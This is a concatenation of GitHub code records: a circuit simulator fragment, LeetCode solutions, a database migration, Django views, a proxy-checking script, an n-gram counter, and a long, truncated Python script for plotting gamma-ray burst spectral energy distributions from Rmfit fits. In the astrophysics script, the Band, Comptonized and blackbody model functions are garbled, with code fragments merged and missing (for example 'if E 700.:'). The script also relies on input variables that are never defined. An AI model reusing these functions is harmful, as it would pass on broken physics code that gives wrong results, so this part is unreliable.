The resulting voltage should\n # be determined by the capacitance of each region.\n # Instead, we use the count of the number of components\n # in each region as an estimate of how much charge \n # each one holds, and set the result hi or low based\n # on which region has the most components.\n if sawFl and sawFh:\n sizes = self.countWireSizes(group)\n if sizes[1] < sizes[0]:\n value = Wire.FLOATING_LOW\n else:\n value = Wire.FLOATING_HIGH\n return value\n\n def addWireToGroup(self, wireIndex, group):\n self.numAddWireToGroup += 1\n group.add(wireIndex)\n wire = self.wireList[wireIndex]\n if wireIndex == self.gndWireIndex or wireIndex == self.vccWireIndex:\n return\n for t in wire.ctInds:\n self.addWireTransistor (wireIndex, t, group)\n\n def addWireTransistor(self, wireIndex, t, group):\n self.numAddWireTransistor += 1\n other = -1\n trans = self.transistorList[t]\n if trans.gateState == NmosFet.GATE_LOW:\n return\n if trans.side1WireIndex == wireIndex:\n other = trans.side2WireIndex\n if trans.side2WireIndex == wireIndex:\n other = trans.side1WireIndex\n if other == self.vccWireIndex or other == self.gndWireIndex:\n group.add(other)\n return\n if other in group:\n return\n self.addWireToGroup(other, group)\n\n\n def countWireSizes(self, group):\n countFl = 0\n countFh = 0\n for i in group:\n wire = self.wireList[i]\n num = len(wire.ctInds) + len(wire.gateInds)\n if wire.state == Wire.FLOATING_LOW:\n countFl += num\n if wire.state == Wire.FLOATING_HIGH:\n countFh += num\n return [countFl, countFh]\n\n","repo_name":"gregjames/Sim2600","sub_path":"circuitSimulatorUsingSets.py","file_name":"circuitSimulatorUsingSets.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"79"} +{"seq_id":"12174137920","text":"# https://leetcode.com/problems/best-time-to-buy-and-sell-stock/\n\n# assumption: stock price is never negative\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if len(prices) < 2:\n return 0\n\n if len(prices) == 2:\n return max(prices[1] - prices[0], 0)\n\n # greatest element to the right of a given index, for each index\n greatest = [-1 for _ in prices]\n greatest[-1] = -1\n for i in range(len(prices)-2, -1, -1):\n greatest[i] = max(greatest[i+1], prices[i+1])\n\n # and our answer follows\n return max(0, max(g - price for price, g in zip(prices, greatest)))\n\n# simpler: store min price so far, max profit so far\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n min_ = 1e10\n max_ = 0\n for price in prices:\n if price < min_:\n min_ = price\n elif price - min_ > max_:\n max_ = price - min_\n return max_\n","repo_name":"ajnirp/leetcode","sub_path":"easy/single-buy-sell.py","file_name":"single-buy-sell.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18745823992","text":"\"\"\"add colum finish_time in order\n\nRevision ID: 42aa75ed3314\nRevises: 2e4ec4661d34\nCreate Date: 2015-09-06 16:14:58.789045\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '42aa75ed3314'\ndown_revision = '2e4ec4661d34'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('bra_client_order', sa.Column('finish_time', sa.DateTime(), nullable=True))\n op.add_column('bra_douban_order', sa.Column('finish_time', sa.DateTime(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('bra_douban_order', 'finish_time')\n op.drop_column('bra_client_order', 'finish_time')\n ### end Alembic commands ###\n","repo_name":"giveme168/braavos","sub_path":"migrations/versions/42aa75ed3314_add_colum_finish_time_in_order.py","file_name":"42aa75ed3314_add_colum_finish_time_in_order.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"72256302016","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Category, Product\n\n# Page with Products\ndef ProductList(request, slug=None):\n category = None\n categories = Category.objects.all()\n products = Product.objects.filter(available=True)\n\n if slug:\n category = get_object_or_404(Category, slug=slug)\n products = products.filter(category=category)\n\n\n return render (request, 'product/list.html', {\n 'category' : category,\n 'categories': categories,\n 'products' :products\n })\n\n\n# Page Product\ndef ProductDetail(request,pk):\n product = get_object_or_404(Product, id=pk, available=True)\n\n breadcrumbs_link = product.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n return render(request,'product/detail.html',{\n 'product':product,\n 'breadcrumbs': breadcrumbs\n })\n\n\n\n\n\n","repo_name":"Deolg/pythonShop","sub_path":"src/shop/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31437647486","text":"\"\"\"\nurl = www.baidu.com\n验证模块\n\"\"\"\nimport grequests\nfrom utils.redis_utils import smembers_proxy, sadd_proxy, del_proxy\nfrom utils.proxy_main import Main_proxy\nfrom utils.configs import HTTP_UNPROCESSED, HTTPS_UNPROCESSED, DEFAULT_URL, SIZE\nfrom utils.log_pag import logger\n\nhttp_proxy = smembers_proxy(HTTP_UNPROCESSED)\nhttps_proxy = smembers_proxy(HTTPS_UNPROCESSED)\n\nproxy_dict = {\n \"http\": http_proxy,\n \"https\": https_proxy\n}\n\nrequest_s = (grequests.get(url=DEFAULT_URL[key], proxies={key: proxy}, timeout=30) for key, val in proxy_dict.items() for proxy in val) # 异步url请求\n\ndelete_proxy_https = Main_proxy.save_proxy\ndelete_proxy_http = Main_proxy.save_proxy\ninsert_proxy_https = Main_proxy.save_proxy\ninsert_proxy_http = Main_proxy.save_proxy\n\n\ndef exception_handler(request, exception):\n if request.kwargs.get(\"proxies\").get(\"https\"):\n delete_proxy_https.append(request.kwargs.get(\"proxies\").get(\"https\"))\n logger().logger.error(\"[报错代理] {}\".format(request.kwargs.get(\"proxies\").get(\"https\")))\n if request.kwargs.get(\"proxies\").get(\"http\"):\n delete_proxy_http.append(request.kwargs.get(\"proxies\").get(\"http\"))\n logger().logger.error(\"[报错代理] {}\".format(request.kwargs.get(\"proxies\").get(\"http\")))\n\n\nresponse_list = grequests.map(request_s, size=SIZE, exception_handler=exception_handler)\nproxies_list = [response for response in response_list if response and response.status_code == 200]\n\nfor res_text in proxies_list:\n if res_text.raw._pool.proxy.scheme == \"http\":\n 
insert_proxy_http.append(\"http://\" + res_text.raw._pool.proxy.host+\":\"+str(res_text.raw._pool.proxy.port))\n else:\n insert_proxy_https.append(\"https://\" + res_text.raw._pool.proxy.host+\":\"+str(res_text.raw._pool.proxy.port))\n\n[sadd_proxy(i, \"Processed\") for i in insert_proxy_https]\n[sadd_proxy(i, \"Processed\") for i in insert_proxy_http]\n[sadd_proxy(i, \"Scrapped\") for i in delete_proxy_https]\n[sadd_proxy(i, \"Scrapped\") for i in delete_proxy_http]\n[del_proxy(i)for i in http_proxy]\n[del_proxy(i)for i in https_proxy]\n\nif __name__ == \"__main__\":\n pass","repo_name":"hewm/super_proxy","sub_path":"utils/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7599123038","text":"import os\nimport pickle\nfrom nltk.util import ngrams\n\n\nclass Ngram:\n\n DOT_DIR = os.environ['HOME'] + '/.pott'\n TXT_DIR = os.environ['HOME'] + '/.pott/txt'\n NGRAM_FILE = os.environ['HOME'] + '/.pott/ngram.pickle'\n\n def __init__(self, max_n=5):\n if not os.path.isdir(self.DOT_DIR):\n os.mkdir(self.DOT_DIR)\n\n if not os.path.isfile(self.NGRAM_FILE):\n self.n_to_ngram = {}\n for n in range(1, max_n):\n self.n_to_ngram[n] = {}\n self._save()\n\n with open(self.NGRAM_FILE, 'rb') as file:\n self.n_to_ngram = pickle.load(file)\n\n def reload(self, paper_by_id):\n os.remove(self.NGRAM_FILE)\n self.__init__()\n for paper in paper_by_id.values():\n print('counting N-gram in \"' + paper.title + '\"')\n with open(self.TXT_DIR + '/' + paper.id + '.txt', 'r') as txt_file:\n self.load(txt_file.read())\n\n def load(self, text):\n for n in self.n_to_ngram.keys():\n for line in text.split('\\n'):\n for ngram in ngrams(line.split(), n):\n ngram = ' '.join(ngram)\n if ngram not in self.n_to_ngram[n]:\n self.n_to_ngram[n][ngram] = 1\n else:\n self.n_to_ngram[n][ngram] += 1\n self._save()\n\n def _save(self):\n with open(self.NGRAM_FILE, mode='wb') as file:\n pickle.dump(self.n_to_ngram, file)\n","repo_name":"jun-harashima/pott","sub_path":"pott/ngram.py","file_name":"ngram.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"30916193591","text":"class Solution:\r\n def divide(self, dividend: int, divisor: int) -> int:\r\n neg = dividend * divisor < 0\r\n dividend = abs(dividend)\r\n divisor = abs(divisor)\r\n if dividend == 0:\r\n return 0\r\n res = 0\r\n current = divisor\r\n pos = 0\r\n while dividend >= current:\r\n current <<= 1\r\n pos+= 1\r\n current >>= 1\r\n print(f\"pos={pos} current={current}\")\r\n for i in range(pos):\r\n if dividend >= current:\r\n dividend -= current\r\n res += 1\r\n res <<= 1\r\n current >>= 1\r\n print(f\"i={i} dividend={dividend} res={res} current={current}\")\r\n res = -(res >> 1) if neg else (res >> 1)\r\n print(res)\r\n return res if -(2**31) <= res <= (2**31-1) else (2**31-1)\r\n\r\nif __name__ == \"__main__\":\r\n s = Solution()\r\n print(s.divide(-2147483648, -1))\r\n","repo_name":"herohunfer/leet2","sub_path":"divide.py","file_name":"divide.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25043972095","text":"\n#!/usr/bin/env python\n\n\n#Code prepared by Khadeejah Motiwala and Saeeda Sajjad\n#2021/07/12\n\nfrom __future__ import print_function\nfrom astropy.io import fits\nimport numpy as np\nimport math as 
math\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom scipy.special import comb\nimport scipy.integrate as si\n#from numpy.core.defchararray import add\n\n\n\n\n#This code is run in the following way.\n#Input: fits file from Rmfit containing the results of spectral fits\n#Output: SED butterfly plot with complete error propagation\n\n\n#Note: This code actually only requires the values of parameters obtained from a spectral fit, the error on the parameters and the covariance matrix. These values are stored in the arrays param_mean, param_err and covariance_matrix respectively. The parameters are ordered according to the Rmfit default order (see comments below). This means that this code can be easily adapted to plot SEDs if the fit parameters, their errors and the covariance matrix is available in some other form.\n\n#Note: To see how the fits file can be obtained from Rmfit, see comments below (one can search for Rmfit).\n\n#Note: The Rmfit file should be named in the following way: BASEMODEL_ADDITIONALCOMPONENT1_ADDITIONALCOMPONENT2_EAC.fit. This means if the spectrum is fitted with the Band model alone the file name should be BAND.fit. If it is fitted with the Band model and an EAC factor is applied, it should be named BAND_EAC.fit. Other examples can be: BAND_BB.fit, BAND_PL.fit, BAND_PL_BB.fit, BAND_PL_BB_EAC.fit\n\n#Note: The base models currently used are CPL, BAND, SBPL. The additional models currently used are PL, BB. More functions can be added if needed.\n\n#Method of use:\n#=============\n#In the INPUT section, give the input parameters, file names etc. See comments in input section.\n\n\n\n#List of models and their parameters in Rmfit\n'''\nFor details look at the file photon_models.ps among rmfit files\nSBPL = Smoothly Broken Power Law\n6 parameters - 4 free - 2 fixed\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----Pivot E - Epiv - fix at 100 keV\n3----Index1 - lambda1 - vary\n4----Break E - Eb - vary keV\n5----Break scale - Delta - fix at 0.3 decades E\n6----Index2 - lambda2 - vary\n\nBand\n4 parameters\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----Epeak - vary keV\n3----alpha - vary\n4----beta - vary\n\nCompton\n4 parameters - 3 free - 1 fixed\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----Epeak - vary keV\n3----Index - vary\n4----Pivot energy - Epiv - fix at 100 keV\n\nPower Law\n3 parameters - 2 free - 1 fixed\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----Pivot energy - Epiv - fix at 100 keV\n3----Index - vary\n\nBlack Body\n2 parameters\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----kT - vary (electron energy in keV)\n\nOrder in rmfit\nPL SBPL Band Comptonized BlackBody\n\n'''\n\n#The fits file used is the one obtained from rmfit by going to the Fit Display window then Fit Results -> Write results to file\n#The code can be adapted to reading a covariance matrix and values of parameters and their errors from some other format too.\n\n#allmodel_names=np.asarray(['SBPL','BAND','CPL','PL','BB'])\n#parnumbers=[6,4,4,3,2]\n\n#Parameter names\n#For SBPL\n#parnames=['A_sbpl','Epiv_sbpl','Alpha','Ebreak','Break Scale','Beta']\n#Use symbol definition from Ep.png (from Feraol). 
It is equivalent to the definition from photon_model.ps (rmfit).\n\n#For Band\n#parnames=['A_band','Epeak_band','alpha','beta']\n\n#For Compton\n#parnames=['A_cpl','Epeak_cpl','Index_cpl','Epiv_cpl']\n\n#For Power Law\n#parnames=['A_pl','Epiv_pl','Index_pl']\n\n#For Black Body\n#parnames=['A_bb','kT']\n\n\n#=================================================================================\n#=========================== FUNCTION DEFINITION =================================\n#=================================================================================\n\n\n\n\n#Functions can be definied in a standalone file which can be called through the following two lines. These should be uncommented if needed. However, in this standalone version, all the functions are defined below, from this point, till the INPUT section. These lines would be present in the function_definitions.py file, if it was being used. The file would have to be in the same folder as this code in order to run the code.\n#with open('function_definitions.py') as infile:\n# exec(infile.read())\n\n\n\n\n\ndef get_model_details(model_name):\n #order of models in rmfit\n rmfitorder=np.array(['PL', 'SBPL', 'BAND', 'CPL', 'BB', 'EAC'])\n #number of parameters in each of these models. I am putting 0 for EAC for now, but I will update this later when the fits file is read.\n rmfit_par_numbers=np.array([3, 6, 4, 4, 2, 0])\n #names of all parameters (model-wise)\n rmfit_parnames=np.array([np.array(['A_pl','Epiv_pl','Index_pl']),\n np.array(['A_sbpl','Epiv_sbpl','alpha_sbpl','Ebreak_sbpl','Delta_sbpl','beta_sbpl']),\n np.array(['A_band','Epeak_band','alpha_band','beta_band']),\n np.array(['A_cpl','Epeak_cpl','Index_cpl','Epiv_cpl']),\n np.array(['A_bb','kT_bb']),\n np.array(['EAC'])],dtype=object)\n rmfit_parfix=np.asarray([np.asarray(['v','f','v']),\n np.asarray(['v','f','v','v','f','v']),\n np.asarray(['v','v','v','v']),\n np.asarray(['v','v','v','f']),\n np.asarray(['v','v'])],dtype=object)\n model_array = np.array(model_name.split('_')) #Get array of models in the original order\n models=np.zeros(model_array.shape[0],dtype='str') #make new empty array of the same length for rmfit order\n #print model_name\n #print 'model_array',model_array\n indices=np.where(np.in1d(rmfitorder,model_array))[0] #Get indices of the models in the original order according to rmfit order\n #print indices\n models=rmfitorder[indices] # new model array\n Nparameters=rmfit_par_numbers[indices] #Array for number of parameters according to rmfit order\n parnames=np.concatenate(rmfit_parnames[indices]) #Array of parameter names according to rmfit order.\n parfix=np.concatenate(rmfit_parfix[indices]) #Array of parameter fix or vary according to rmfit order.\n #print rmfit_parnames[indices]\n #print 'nparnames',parnames\n return models, Nparameters,parnames,parfix\n\n\n\n###################################################################################\n#FUNCTIONS WITH MODEL DEFINITIONS, ERROR CALCULATION, OTHERS\n###################################################################################\n\n\n\n\n\n\ndef fSBPL(E,A,Epiv,alpha,Ebreak,delta,beta):\n Epiv=100.\n delta=0.3\n r=math.log10(E/Ebreak)/delta\n rp=math.log10(Epiv/Ebreak)/delta\n a=1./2.*delta*(beta-alpha)*np.log((np.exp(r)+np.exp(-r))/2.)\n ap=1./2.*delta*(beta-alpha)*np.log((np.exp(rp)+np.exp(-rp))/2.)\n N=A*(E/Epiv)**((alpha+beta)/2.)*10.**(a-ap)\n return N\n\n\n\ndef fBAND(E,Amplitude,Epeak, alpha, beta):\n Ec = (alpha-beta)*Epeak/(2.+alpha)\n if E 700.\n if E/kT >700:\n N=0.\n else:\n 
N=A*(E**2/(np.exp(E/kT)-1.))\n return N\n\n\n\ndef fPL_err2(E, A, Epiv, index, s2A, s2Epiv, s2index, sAindex):\n f = fPL(E, A, Epiv, index)\n Epiv=100.\n partialA_pl=f/A\n partialEpiv_pl=0.\n partialIndex_pl=f*np.log(E/Epiv)\n err2 = partialA_pl**2*s2A+partialIndex_pl**2*s2index+2.*partialA_pl*partialIndex_pl*sAindex\n return err2, partialA_pl, partialIndex_pl,partialEpiv_pl\n\n\n\ndef fBAND_err2(E, A_band, Epeak, alpha, beta, s2band_A, s2band_Epeak, s2band_alpha, s2band_beta, s_bandAEpeak, s_bandAalpha, s_bandAbeta, s_bandEpeakalpha, s_bandEpeakbeta, s_bandalphabeta):\n Ec = (alpha-beta)*Epeak/(2.+alpha)\n f=fBAND(E, A_band, Epeak, alpha, beta)\n partialA_band = f / A_band\n if E < Ec:\n partialEpeak_band = f * E * (2. + alpha) / Epeak ** 2.\n partialalpha_band = f * ( np.log(E/100.)- E / Epeak )\n partialbeta_band = 0.\n else:\n partialEpeak_band = f * (alpha - beta) / Epeak\n partialalpha_band = f * (np.log(((alpha - beta) * Epeak) / (100. * (2. + alpha))) - (alpha - beta) / (2. + alpha))\n partialbeta_band = f * (np.log(E) - np.log(((alpha - beta) * Epeak) / (2. + alpha)))\n\n err2 = (partialA_band)**2.*s2band_A+(partialEpeak_band)**2*s2band_Epeak+(partialalpha_band)**2.*s2band_alpha+(partialbeta_band)**2.*s2band_beta+2.*(partialA_band*partialEpeak_band*s_bandAEpeak+partialA_band*partialalpha_band*s_bandAalpha+partialA_band*partialbeta_band*s_bandAbeta+partialEpeak_band*partialalpha_band*s_bandEpeakalpha+partialEpeak_band*partialbeta_band*s_bandEpeakbeta+partialalpha_band*partialbeta_band*s_bandalphabeta)\n\n return err2, partialA_band, partialbeta_band, partialalpha_band, partialEpeak_band\n\n\ndef fCPL_err2(E, A, Epeak, index, Epiv, s2A, s2Epeak, s2index, s2Epiv,s_AEpeak, s_Aindex, s_Epeakindex):\n Epiv=100.\n f = fCPL(E, A, Epeak, index, Epiv)\n\n partialA_cpl = f / A\n partialEpeak_cpl = f * (2. + index) * E / Epeak ** 2\n partialIndex_cpl = f * (math.log(E / Epiv) - E / Epeak)\n partialEpiv_cpl=0.\n\n err2 = partialA_cpl ** 2 * s2A + partialEpeak_cpl ** 2 * s2Epeak + partialIndex_cpl ** 2 * s2index + 2.*(partialA_cpl*partialEpeak_cpl*s_AEpeak+partialA_cpl*partialIndex_cpl*s_Aindex+partialEpeak_cpl*partialIndex_cpl*s_Epeakindex)\n\n return err2, partialA_cpl, partialIndex_cpl, partialEpeak_cpl,partialEpiv_cpl\n\n\ndef fBB_err2(E, A, kT, s2A, s2kT, s_AkT):\n f = fBB(E, A, kT)\n # For very small f (less than 1.e304) do not calculate errors. The function is practically zero and so will be its errors. This avoids warnings and nan in the output.\n if f < 1.e304:\n partialA_bb = 0.\n partialkT_bb = 0.\n else:\n partialA_bb = f / A\n partialkT_bb = f * np.exp(E / kT) * E / kT ** 2 * (1. / (np.exp(E / kT) - 1.))\n\n err2 = (partialA_bb) ** 2 * s2A + (partialkT_bb) ** 2 * s2kT + 2.*partialA_bb*partialkT_bb*s_AkT\n\n return err2, partialA_bb, partialkT_bb\n\n\ndef fSBPL_err2(E, A, Epiv, alpha, Ebreak, delta, beta, s2A, s2Epiv, s2alpha, s2Ebreak, s2delta, s2beta, s_alphabeta,s_AEbreak,s_Aalpha, s_Abeta,s_Ebreakalpha, s_Ebreakbeta ):\n f = fSBPL(E, A, Epiv, alpha, Ebreak, delta, beta)\n r = math.log10(E / Ebreak) / delta\n rp = math.log10(Epiv / Ebreak) / delta\n a = 1. / 2. * delta * (beta - alpha) * np.log((np.exp(r) + np.exp(-r)) / 2.)\n ap = 1. / 2. * delta * (beta - alpha) * np.log((np.exp(rp) + np.exp(-rp)) / 2.)\n\n # partial derivative w. r. t. A\n partialA_sbpl = f / A\n partialEbreak_sbpl = f * (beta - alpha)/(2.*Ebreak)*((np.exp(rp)-np.exp(-rp))/(np.exp(rp)+np.exp(-rp))-((np.exp(r)-np.exp(-r))/(np.exp(r)+np.exp(-r))))\n partialalpha_sbpl = f / 2. 
* (np.log(E/100.)+delta*np.log(10)*(np.log(np.exp(rp)+np.exp(-rp))-np.log(np.exp(r)+np.exp(-r))))\n partialbeta_sbpl = f / 2. * (np.log(E/100.)+delta*np.log(10)*(np.log(np.exp(r)+np.exp(-r))-np.log(np.exp(rp)+np.exp(-rp))))\n partialEpiv_sbpl=0.\n partialdelta_sbpl=0.\n partialDelta_sbpl= partialdelta_sbpl\n\n err2 = partialA_sbpl ** 2 * s2A + partialEbreak_sbpl ** 2 * s2Ebreak + partialalpha_sbpl ** 2 * s2alpha + partialbeta_sbpl ** 2 * s2beta + 2.*(partialA_sbpl*partialEbreak_sbpl*s_AEbreak+partialA_sbpl*partialalpha_sbpl*s_Aalpha+partialA_sbpl*partialbeta_sbpl*s_Abeta+partialEbreak_sbpl*partialalpha_sbpl*s_Ebreakalpha+partialEbreak_sbpl*partialbeta_sbpl*s_Ebreakbeta+partialalpha_sbpl*partialbeta_sbpl*s_alphabeta)\n\n return err2, partialA_sbpl, partialbeta_sbpl, partialalpha_sbpl, partialEbreak_sbpl,partialEpiv_sbpl,partialDelta_sbpl\n\n\n\n\n#=================================================================================\n#========================= END FUNCTION DEFINITIONS =============================\n#=================================================================================\n\n\n\n\n\n\n\n\n\n\n\n\n\n#=================================================================================\n#================================== MAIN ========================================\n#=================================================================================\n\n\n\n#FILE NAMES\n#==========\n\nstr_EAC=''\nif eac:\n str_EAC='_EAC'\nstr_MODEL=model_complete+str_EAC\nstr_file=directory+str_MODEL+'.fit' # 020_GRB130427324 BAND_PL_BB_EAC.fit file\n\n\nstr_modelname=model_complete.replace('_','+')\n#open file\nhdu=fits.open(str_file) # open fits file\n\n#MODEL, COMPONENTS\n#=================\nmodel_components=np.array(model_complete.split('_'))\nbasemodel=model_components[0]\nprint (model_components,basemodel)\n# Get array of models, array of parameter numbers, and array of parameter names in rmfit order.\nmodels,Nparameters,parnames,parfix=get_model_details(model_complete)\nindexmain=np.where(models == basemodel)[0][0] #Find position of main model after reordering models according to rmfit order.\nNparameters_model_only=np.sum(Nparameters) #Total number of parameters in the model.\n#Get number of model components (excluding EAC)\nNcomponents=models.shape[0]\nif models[Ncomponents-1]=='EAC':\n Ncomponents=Ncomponents-1\n\n#Find indices of fixed parameters in this model\nindfix=np.where(parfix=='f')[0]\n#Find indices of variable parameters in this model\nindvary=np.where(parfix=='v')[0]\n\n#Initialise parameter names\nfullparnames=np.full(Nparameters_model_only,' '*40)\nfullparnames_err=np.full(Nparameters_model_only,' '*40)\n\n\n# GET COVARIANCE MATRIX AND MEAN VALUES OF ALL PARAMETERS\n#========================================================\ntmpcovariance_matrix=hdu[2].data.field('COVARMAT') # with EAC\nif tmpcovariance_matrix[0][0].shape[0] != Nparameters_model_only:\n print('Incompatible covariance matrix size - correct for EAC')\ncovariance_matrix=tmpcovariance_matrix[0][0:Nparameters_model_only,0:Nparameters_model_only] # Copy covariance matrix for model parameters only (ignore EAC)\n\n#Replace columns for fixed parameters with zero.\nfor j in indfix:\n covariance_matrix[:,j]=0.\n#Replace rows for fixed parameters with zero.\nfor i in indfix:\n covariance_matrix[i,:]=0. 
\n covariance_matrix[np.abs(covariance_matrix) < 1.e-18] = 0.\n\n\n#Read parameters values and their erros \nparam_mean=[]\nparam_err=[]\n\nfor ip in range(Nparameters_model_only):\n param_mean.append(hdu[2].data.field('PARAM'+str(ip))[0][0])\n param_err.append(hdu[2].data.field('PARAM'+str(ip))[0][1])\n # strout=parnames[ip].ljust(18)+'= '+str(\"%0.3e\"%param_mean[ip]).rjust(12)+' +/- '+str(\"%0.3e\"%param_err[ip]).rjust(12)+'\\n'\n # fileout.write(strout) \n #print(parnames[ip],'= ',param_mean[ip],'+/-',param_err[ip])\nparam_mean=np.asarray(param_mean)\n\n# Calculate flux, get Epeak array\n#================================\n# empty array for the flux, fluence for each of the simulated model.\nnvect=1\nflux_array=np.zeros(nvect)\nfluence_array=np.zeros(nvect)\nflux_BB_array=np.zeros(nvect)\nflux_bolometric_array=np.zeros(nvect)\nphoton_flux_E=np.zeros(nvect) # photon flux at a given energy Energy_flux_fluence\n\nEpeak_array=np.zeros(nvect)\n\n\n\nvE=np.logspace(E1,E2,10000) #Vector for energies keV\n\nif OPT_plot_limit_vE_highest:\n ie_low=0\n ie_high= np.argwhere(vE >= Emax_highest)[0][0]-1\n \n print(np.argwhere(vE >= Emax_highest))\n print (ie_low, ie_high)\nelse:\n ie_low=0\n ie_high= vE.shape[0]\n#print (ie_low, ie_high)\n \n#exit()\n\n# Initialisations for model\nSED_components=[] # Create list for model component vectors for SED for later plots. This list will be saved in a npy file.\nSED_components.append(vE) #Add energy vector to list to make plots later\nSED_sum=np.zeros(vE.shape) #Create empy numpy array for SED for sum of models\n\nisim=0\n#Loop on models\nip=0 # number of parameters already read\n\nfor ic, component in enumerate(models):\n base=False\n if ic==indexmain:\n base=True\n \n if component=='PL':\n val_A=param_mean[ip]\n val_Epiv=param_mean[ip+1]\n val_Epiv=100.\n val_index=param_mean[ip+2]\n # Calculate flux\n # Call function/calculations\n vfPL = np.vectorize(fPL)\n vvfPL =vfPL(vE,val_A,val_Epiv, val_index)\n SED_PL=vE**2*vvfPL*keVtoErg\n SED_components.append(SED_PL) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_PL\n plt.loglog(vE[ie_low:ie_high],SED_PL[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2A =covariance_matrix[ip,ip]\n val_s2Epiv=covariance_matrix[ip+1,ip+1]\n val_s2index=covariance_matrix[ip+3,ip+3]\n val_sAindex=covariance_matrix[ip, ip+3]\n\n vfPL_err2 = np.vectorize(fPL_err2)\n vvfPL_err2, partialA_pl, partialIndex_pl,partialEpiv_pl = vfPL_err2(vE, val_A, val_Epiv, val_index, val_s2A, val_s2Epiv, val_s2index, val_sAindex)\n\n SED_PL_ERR = vE ** 2 * np.sqrt(vvfPL_err2) * keVtoErg\n SED_PL_high = SED_PL + SED_PL_ERR\n SED_PL_low = SED_PL - SED_PL_ERR\n\n if component=='SBPL':\n val_A=param_mean[ip]\n val_Epiv=param_mean[ip+1]\n val_Epiv=100.\n val_alpha=param_mean[ip+2]\n val_Ebreak=param_mean[ip+3]\n val_delta=param_mean[ip+4]\n val_delta=0.3\n val_beta=param_mean[ip+5]\n #Epeak\n if base: #get rid of this?\n Epeak_array[isim]=val_Ebreak*10**(1./(2.)*val_delta*np.log((val_alpha+2.)/(-val_beta-2.)))\n vfSBPL = np.vectorize(fSBPL)\n vvfSBPL=vfSBPL(vE,val_A,val_Epiv,val_alpha, val_Ebreak, val_delta, val_beta )\n SED_SBPL=vE**2*vvfSBPL*keVtoErg\n SED_components.append(SED_SBPL) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_SBPL\n # plot\n plt.loglog(vE[ie_low:ie_high],SED_SBPL[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2A =covariance_matrix[ip,ip]\n val_s2Epiv =covariance_matrix[ip+1,ip+1]\n val_s2alpha 
=covariance_matrix[ip+2,ip+2]\n val_s2Ebreak =covariance_matrix[ip+3,ip+3]\n val_s2delta=covariance_matrix[ip+4,ip+4]\n val_s2beta =covariance_matrix[ip+5,ip+5]\n val_s_alphabeta=covariance_matrix[ip+2,ip+5]\n val_s_AEbreak =covariance_matrix[ip,ip+3]\n val_s_Aalpha =covariance_matrix[ip,ip+2]\n val_s_Abeta =covariance_matrix[ip,ip+5]\n val_s_Ebreakalpha=covariance_matrix[ip+2,ip+3]\n val_s_Ebreakbeta=covariance_matrix[ip+3,ip+5]\n vfSBPL_err2 = np.vectorize(fSBPL_err2)\n vvfSBPL_err2, partialA_sbpl, partialbeta_sbpl, partialalpha_sbpl, partialEbreak_sbpl,partialEpiv_sbpl,partialDelta_sbpl = vfSBPL_err2(vE, val_A, val_Epiv, val_alpha, val_Ebreak, val_delta, val_beta, val_s2A, val_s2Epiv, val_s2alpha, val_s2Ebreak, val_s2delta,\n val_s2beta, val_s_alphabeta, val_s_AEbreak, val_s_Aalpha, val_s_Abeta, val_s_Ebreakalpha, val_s_Ebreakbeta)\n\n SED_SBPL_ERR = vE ** 2 * np.sqrt(vvfSBPL_err2) * keVtoErg\n SED_SBPL_high = SED_SBPL + SED_SBPL_ERR\n SED_SBPL_low = SED_SBPL - SED_SBPL_ERR\n\n if component=='BAND':\n val_A=param_mean[ip]\n val_Epeak=param_mean[ip+1]\n val_alpha=param_mean[ip+2]\n val_beta=param_mean[ip+3]\n \n #Epeak\n if base:\n Epeak_array[isim]=val_Epeak\n vfBAND = np.vectorize(fBAND)\n vvfBAND=vfBAND(vE,val_A,val_Epeak,val_alpha, val_beta )\n SED_BAND=vE**2*vvfBAND*keVtoErg\n SED_components.append(SED_BAND) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_BAND\n # plot\n plt.loglog(vE[ie_low:ie_high],SED_BAND[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2band_A=covariance_matrix[ip,ip]\n val_s2band_Epeak=covariance_matrix[ip+1,ip+1]\n val_s2band_alpha=covariance_matrix[ip+2,ip+2]\n val_s2band_beta=covariance_matrix[ip+3,ip+3]\n val_s_bandAEpeak=covariance_matrix[ip,ip+1]\n val_s_bandAalpha=covariance_matrix[ip,ip+2]\n val_s_bandAbeta=covariance_matrix[ip,ip+3]\n 